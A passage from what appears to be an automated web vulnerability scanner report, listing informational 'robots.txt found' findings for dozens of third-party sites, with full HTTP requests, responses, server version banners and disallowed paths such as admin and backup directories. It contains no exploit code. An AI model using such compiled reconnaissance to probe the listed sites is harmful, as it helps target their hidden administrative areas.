Accept-Ranges: bytes
Content-Length: 163
Cache-Control: max-age=31536000
Expires: Wed, 02 May 2012 10:27:03 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow:

Sitemap: http://www.rugdoctor.com/sitemap.xml
Sitemap: http://rent.rugdoctor.com/sitemap.xml
Sitemap: http://buy.rugdoctor.com/sitemap.xml

26.881. http://www.runningroom.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.runningroom.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.runningroom.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:09:41 GMT
Server: Apache/2.0.64
Last-Modified: Fri, 02 Mar 2007 15:23:47 GMT
ETag: "d2a415-53-31a126c0"
Accept-Ranges: bytes
Content-Length: 83
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /discussion//profile.php
Disallow: /discussion/profile.php

26.882. http://www.runningwarehouse.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.runningwarehouse.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.runningwarehouse.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:54 GMT
Server: 4D_WebSTAR_S/5.4.0 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Wed, 22 Feb 2006 13:20:04 GMT
Content-Length: 25
Content-Type: text/plain

User-agent: *
Disallow:

26.883. http://www.rushbackstage.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rushbackstage.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rushbackstage.com

Response

HTTP/1.1 200 OK
Content-Length: 167
Content-Type: text/plain
Last-Modified: Sun, 20 Dec 2009 00:17:47 GMT
Accept-Ranges: bytes
ETag: "6cc690db981ca1:28d"
Server: Microsoft-IIS/6.0
ssl: md-ssl
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:47:31 GMT
Connection: close

User-Agent: *
Disallow: /manager/
Disallow: /export/
Disallow: /export/category/
Disallow: /export/customer/
Disallow: /export/order/
Disallow: /dianakrallstore/

26.884. http://www.rv-clubs.us/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rv-clubs.us
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rv-clubs.us

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:46:56 GMT
Server: Apache
Last-Modified: Thu, 20 Apr 2006 13:04:38 GMT
ETag: "1e0b79-28-444786e6"
Accept-Ranges: bytes
Content-Length: 40
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/

26.885. http://www.rvntracker.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rvntracker.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rvntracker.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 28 Dec 2007 17:23:49 GMT
ETag: "4620140-1d-f522d340"
Accept-Ranges: bytes
Content-Length: 29
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /rd/

26.886. http://www.rvsurplus.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rvsurplus.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rvsurplus.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:13:53 GMT
Server: Apache
Last-Modified: Thu, 09 Jul 2009 04:30:09 GMT
ETag: "102260-31-46e3e4f947640"
Accept-Ranges: bytes
Content-Length: 49
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /core/
Disallow: /admin/

26.887. http://www.rxassist.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rxassist.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rxassist.org

Response

HTTP/1.1 200 OK
Content-Length: 132
Content-Type: text/plain
Content-Location: http://www.rxassist.org/robots.txt
Last-Modified: Wed, 01 Dec 2010 18:36:39 GMT
Accept-Ranges: bytes
ETag: "6065db18691cb1:2a6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 09:56:24 GMT
Connection: close

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

26.888. http://www.ryland.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ryland.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ryland.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 19 Apr 2011 21:53:18 GMT
Accept-Ranges: bytes
ETag: "05b1631dcfecb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: .ASPXANONYMOUS=nUKMwxJAzAEkAAAAMjQ0ZTNjNzMtOTYwNC00ZWQ0LTg0MzQtNWFmMDM2NjYxZjk47vdWpPR9rMijtw2pYPvzvzGGCvY1; domain=www.ryland.com; expires=Mon, 11-Jul-2011 21:37:42 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:57:41 GMT
Connection: close
Content-Length: 401

User-agent: *
Disallow: /cgi-bin/
Disallow: /sign-in.html?
Disallow: /sign-up.html?
Disallow: /searchresults.html?
Disallow: /email-a-friend.html?
Disallow: /myryland/
Disallow: /home/investors
...[SNIP]...

26.889. http://www.sa-venues.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sa-venues.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sa-venues.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:40:45 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 07 Nov 2009 17:23:18 GMT
ETag: "2d38d87-278-477cb3760cd80"
Accept-Ranges: bytes
Content-Length: 632
Connection: close
Content-Type: text/plain; charset=iso-8859-1

Sitemap: http://www.sa-venues.com/sitemap.xml
Sitemap: http://www.sa-venues.com/urllist.txt

User-agent: *
Disallow: /my-choices/
Disallow: /attractionswc/greybox/
Disallow: /bw/greybox/
Disall
...[SNIP]...

26.890. http://www.safecompare.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.safecompare.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.safecompare.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:20 GMT
Server: Apache
Last-Modified: Thu, 23 Dec 2010 15:57:40 GMT
ETag: "280ac-19-49815ede84500"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.891. http://www.salespider.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.salespider.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.salespider.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:53:53 GMT
Server: Apache/1.3.37 (Unix) mod_gzip/1.3.26.1a mod_ssl/2.8.28 OpenSSL/0.9.7e-p1 PHP/5.2.1 with Suhosin-Patch
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Last-Modified: Tue, 02 Jun 2009 18:27:34 GMT
ETag: "152c491-1aa9-4a256f16"
Accept-Ranges: bytes
Content-Length: 6825
Connection: close
Content-Type: text/plain

User-agent: Arachnophilia
Disallow: /

User-agent: Arale
Disallow: /

User-agent: ARIADNE
Disallow: /

User-agent: unnamed
Disallow: /

User-agent: Big Brother
Disallow: /

User-agent: Bloodhound
Disa
...[SNIP]...

26.892. http://www.saltworks.us/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.saltworks.us
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.saltworks.us

Response

HTTP/1.1 200 OK
Content-Length: 187
Content-Type: text/plain
Last-Modified: Tue, 19 Jan 2010 18:30:35 GMT
Accept-Ranges: bytes
ETag: "a4ee97d3599ca1:2e0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:48:18 GMT
Connection: close

User-agent: *

Disallow: /bin/

Disallow: /images/

Disallow: /m_control/

Disallow: /PrivacyPolicy.asp
Disallow: /TellAFriend.asp

Sitemap: http://www.saltworks.us/sitemap.xml

26.893. http://www.samsontech.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.samsontech.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.samsontech.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:40:56 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Tue, 10 Mar 2009 19:10:36 GMT
ETag: "5efd7be4b3a1c91:1d57"
Content-Length: 126

# robots.txt for http://samsontech.com

User-agent: *
Disallow: /products/relatedDocs/
Disallow: /software/
Disallow: /media/

26.894. http://www.sanfranrecruiter.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sanfranrecruiter.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sanfranrecruiter.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:28:40 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=305a7a53d258ffc4c1d046da95b24def; path=/
Connection: close
Content-Type: text/plain

User-Agent: sitecheck.internetseer.com
Disallow: /

User-Agent: ia_archiver
Disallow: /

User-Agent: NPBot
Disallow: /

User-agent: fast
Disallow: /

User-agent: TurnitinBot
Disallow: /

User-agent: M
...[SNIP]...

26.895. http://www.saukvalley.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.saukvalley.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.saukvalley.com

Response

HTTP/1.0 200 OK
Vary: Cookie, User-Agent
Server: Roxen/4.5.241-release4
ETag: "b1ee1553f890f86b93808d62acfa6ad9"
Accept-Ranges: bytes
Last-Modified: Tue, 03 May 2011 11:06:39 GMT
Date: Tue, 03 May 2011 11:06:39 GMT
Expires: Mon, 03 May 2010 05:06:39 GMT
Connection: close
Content-Length: 65
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search.xml
Disallow: /searchresults/

26.896. http://www.savevid.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.savevid.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.savevid.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 03 May 2011 11:27:22 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 415
Last-Modified: Mon, 22 Nov 2010 08:14:21 GMT
Connection: close
Accept-Ranges: bytes

Sitemap: http://www.savevid.com/sitemap.xml

User-agent: Mediapartners-Google
Allow: /

User-agent: Googlebot
Allow: /
Disallow : /actions/

User-agent: Googlebot-Image
Allow: /

User-agent: ScoutJet

...[SNIP]...

26.897. http://www.sawadee.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sawadee.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sawadee.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:10:37 GMT
Server: Apache/2.2.17
Last-Modified: Mon, 03 Jan 2011 15:43:30 GMT
ETag: "16fa50c-55-498f3037f6c80"
Accept-Ranges: bytes
Content-Length: 85
Connection: close
Content-Type: text/plain

User-agent: Googlebot-Image
Disallow: /imgevent/
Disallow: /R24/
Disallow: /R24n/

26.898. http://www.scancafe.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scancafe.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scancafe.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:14 GMT
Server: Apache
Set-Cookie: PHPSESSID=2mucvfjblrpq7njm2bu7tcggh5; path=/; HttpOnly
Expires: Tue, 03 May 2011 11:42:14 GMT
Cache-Control: max-age=0, must-revalidate
Pragma:
ETag: "5b7f4bdad2f5b6b449f7f7339eaf2b04"
Content-Length: 484
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin
Disallow: /backend
Disallow: /testscripts
Disallow: /filebackup
Disallow: /Fckeditor
Disallow: /extends28feb
Disallow: /upslabels
Disallow: /labels
Disallow: /specs
Disa
...[SNIP]...

26.899. http://www.scetv.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scetv.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scetv.org

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/plain
Content-Location: http://www.scetv.org/robots.txt
Last-Modified: Thu, 03 Mar 2011 17:16:22 GMT
Accept-Ranges: bytes
ETag: "ed681cb8c6d9cb1:562a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:34:05 GMT
Connection: close

User-agent: *
Disallow: /admin/
Disallow: /electiontest/
Disallow: /DEV/
Disallow: /ee/
Disallow: /salli/
Disallow: /testing/
Disallow: /test/
Disallow: /themes/
Disallow: /Templates/
Disall
...[SNIP]...

26.900. http://www.schema-root.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.schema-root.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.schema-root.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:01:00 GMT
Server: Apache
Last-Modified: Sat, 23 Dec 2006 09:58:06 GMT
ETag: "4968439-5b-4254299d84780"
Accept-Ranges: bytes
Content-Length: 91
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-delay: 3
Disallow: /~
Disallow: /_
Disallow: /p/
Allow: /_stacks

26.901. http://www.schneider-electric.us/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.schneider-electric.us
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.schneider-electric.us

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"27-1295433317000"
Last-Modified: Wed, 19 Jan 2011 10:35:17 GMT
Content-Type: text/plain
Date: Tue, 03 May 2011 11:17:14 GMT
Content-Length: 27
Connection: close

User-agent: *
Allow: /

26.902. http://www.schuelervz.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.schuelervz.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.schuelervz.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:51 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Server: Apache
Last-Modified: Tue, 14 Jul 2009 07:33:20 GMT
ETag: "4015ad-45-4a5c34c0"
Accept-Ranges: bytes
Content-Length: 69
X-Frontend: nothing

Sitemap: http://www.schuelervz.net/sitemap.xml
User-Agent: *
Allow: /

26.903. http://www.scjohnson.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scjohnson.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scjohnson.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 14 Oct 2009 18:45:38 GMT
Accept-Ranges: bytes
ETag: "b54c1c86fe4cca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: Web02
Date: Tue, 03 May 2011 10:27:33 GMT
Connection: close
Content-Length: 205

#Robots.txt - Tells search bots which folders to disregard
#last updated 10.14.2009

User-agent: *
Disallow: /sitefinity/
Disallow: /Sitefinity/
Disallow: /en/sitefinity/
Disallow: /en/Sitefini
...[SNIP]...

26.904. http://www.scott-sports.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scott-sports.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scott-sports.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:30:24 GMT
Server: Apache
Last-Modified: Wed, 26 May 2010 20:31:35 GMT
ETag: "fe4a50-a1-4878528fe57c0"
Accept-Ranges: bytes
Content-Length: 161
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /engine/
Crawl-delay: 120
Request-rate: 1/10
Visit-time: 0100-0500

User-agent: msnbot
Crawl-delay: 5

User-agent: Slurp
Crawl-delay: 5

26.905. http://www.scrapjazz.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scrapjazz.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scrapjazz.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:49:28 GMT
Server: Apache/2.0.59 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Expires: 0
Content-Length: 6224
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

###############################
#
# robots.txt file for scrapjazz.com
#
# addresses all robots by using wild card *
#

User-agent: Nutch
Disallow: /

User-agent: Jetbot/1.0
Disallow: /

User-agent: J
...[SNIP]...

26.906. http://www.seat42f.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.seat42f.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seat42f.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:30:38 GMT
Server: Apache/2.2.8 (Fedora)
Last-Modified: Sun, 22 Aug 2010 04:40:18 GMT
ETag: "17767d6-11d-48e6220f97080"
Accept-Ranges: bytes
Content-Length: 285
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /m
...[SNIP]...

26.907. http://www.seedrack.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.seedrack.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seedrack.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:53 GMT
Server: Apache
Last-Modified: Thu, 08 Jan 2009 17:18:10 GMT
ETag: "8ac81c-5c-d31a7880"
Accept-Ranges: bytes
Content-Length: 92
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ares/
Disallow: /invoices/
Disallow: /cgi-bin/
Disallow: /mofcart/

26.908. http://www.sekindo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sekindo.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sekindo.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "3752414455"
Last-Modified: Wed, 10 Feb 2010 14:01:35 GMT
Content-Length: 296
Connection: close
Date: Tue, 03 May 2011 10:29:30 GMT
Server: lighttpd/1.4.26

User-agent: *
Disallow: /help/terms.php

User-agent: *
Disallow: /help/privacy.php

User-agent: *
Disallow: /help/fee.php

User-agent: *
Disallow: /help/copyright.php

User-agent: *
Disal
...[SNIP]...

26.909. http://www.sellingcrossing.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sellingcrossing.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sellingcrossing.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:53:52 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 07:23:45 GMT
ETag: "1d88564-1abb-49f99f0c38240"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6843
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

26.910. http://www.serialcoded.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.serialcoded.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.serialcoded.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 03:02:30 GMT
Server: Apache/2
Last-Modified: Tue, 14 Dec 2010 01:32:33 GMT
ETag: "3b280e2-26-49754cb6fee40"
Accept-Ranges: bytes
Content-Length: 38
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /getserial.php

26.911. http://www.servicecu.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.servicecu.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.servicecu.org

Response

HTTP/1.1 200 OK
Content-Length: 27
Content-Type: text/plain
Last-Modified: Tue, 28 Dec 2010 15:02:01 GMT
ETag: "6294a02ea0a6cb1:768"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:41:03 GMT
Connection: close

User-agent: *
Allow: /

26.912. http://www.sevensidedcube.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sevensidedcube.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sevensidedcube.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:28:13 GMT
Server: Apache
Vary: Cookie
X-Pingback: http://www.sevensidedcube.net/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.sevensidedcube.net/sitemap.xml.gz

26.913. http://www.sewingmachinesplus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sewingmachinesplus.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sewingmachinesplus.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:33 GMT
Server: Apache
Last-Modified: Fri, 13 Mar 2009 21:36:39 GMT
ETag: "21c88f8-45-e55b07c0"
Accept-Ranges: bytes
Content-Length: 69
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /cgi-sewingmachinesplus/sb/
Disallow: /regs/

26.914. http://www.sharpened.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sharpened.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sharpened.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:45 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
Last-Modified: Sat, 13 Nov 2010 23:00:09 GMT
ETag: "3f50068-2f-2b2c5040"
Accept-Ranges: bytes
Content-Length: 47
Connection: close
Content-Type: text/plain

# robots.txt

User-agent: *
Disallow: /cgi-bin/

26.915. http://www.sheezyart.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sheezyart.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sheezyart.com

Response

HTTP/1.0 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 32
Connection: close
Date: Tue, 03 May 2011 10:21:50 GMT
Server: lighttpd/1.4.26

User-Agent: Googlebot
Disallow:

26.916. http://www.shopovertime.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopovertime.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shopovertime.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:40:01 GMT
Server: Apache
Last-Modified: Mon, 24 Sep 2007 19:34:51 GMT
ETag: "183c7e0-1a-b6d2ccc0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.917. http://www.shoutbox.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shoutbox.de
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shoutbox.de

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 03 May 2011 10:31:06 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Fri, 01 Oct 2010 21:39:26 GMT
ETag: "43a03a5-1a-491950754df80"
Accept-Ranges: bytes
Content-Length: 26

User-agent: *
Disallow:

26.918. http://www.silobreaker.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silobreaker.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.silobreaker.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 13 Apr 2011 12:46:54 GMT
Accept-Ranges: bytes
ETag: "073d2ddd8f9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:24:29 GMT
Connection: close
Content-Length: 2728

#
# robots.txt inspired by http://www.wikipedia.org/
#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
#
...[SNIP]...

26.919. http://www.silvercross.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silvercross.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.silvercross.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:44:59 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 03 Dec 2009 14:50:03 GMT
ETag: "13ae8161-53-479d41b2ffcc0"
Accept-Ranges: bytes
Content-Length: 83
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /WebObjects/
Disallow: /otherdomains/
Disallow: /~private/

26.920. http://www.simpleanddelicious.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.simpleanddelicious.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.simpleanddelicious.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:23 GMT
Server: Apache/2.2.9 (Unix) DAV/2 mod_jk/1.2.28 mod_ssl/2.2.9 OpenSSL/0.9.8h mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Tue, 16 Jun 2009 17:08:07 GMT
ETag: "821b21-b4-46c7a37ee0bc0"
Accept-Ranges: bytes
Content-Length: 180
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /*email-to-friend.jsp
Disallow: /*recipePrint.jsp
Disallow: /*menuplan.do
Disallow: /*printCoupon.do

Sitemap: http://www.simpleanddelicious.com/sitemap.xml

26.921. http://www.simplybestcoupons.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.simplybestcoupons.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.simplybestcoupons.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 08 Mar 2011 16:00:07 GMT
Accept-Ranges: bytes
ETag: "49d31e5a9ddcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:43:51 GMT
Connection: close
Content-Length: 102

